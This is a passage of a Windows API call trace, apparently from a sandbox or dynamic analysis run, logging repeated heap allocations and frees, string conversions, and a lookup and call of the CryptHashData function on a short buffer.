RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54ea8 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0140.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0140.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0140.817] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2e54dd8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0140.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.817] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x3) returned 0x2e54e58 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0140.818] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0140.818] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0140.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0140.819] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.819] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.819] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977998 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.820] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0140.820] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0140.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0140.821] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2e50ab8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.821] GetProcAddress (hModule=0x756e0000, lpProcName="CryptHashData") returned 0x756feef0 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0140.821] CryptHashData (hHash=0xa873d0, pbData=0x2e54da8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0140.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977ae8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0140.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0140.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a88 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0140.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0140.824] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0140.824] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0140.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50cb0 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0140.824] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0140.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0140.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0140.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0140.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0140.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0140.825] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c98 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0140.825] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0140.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 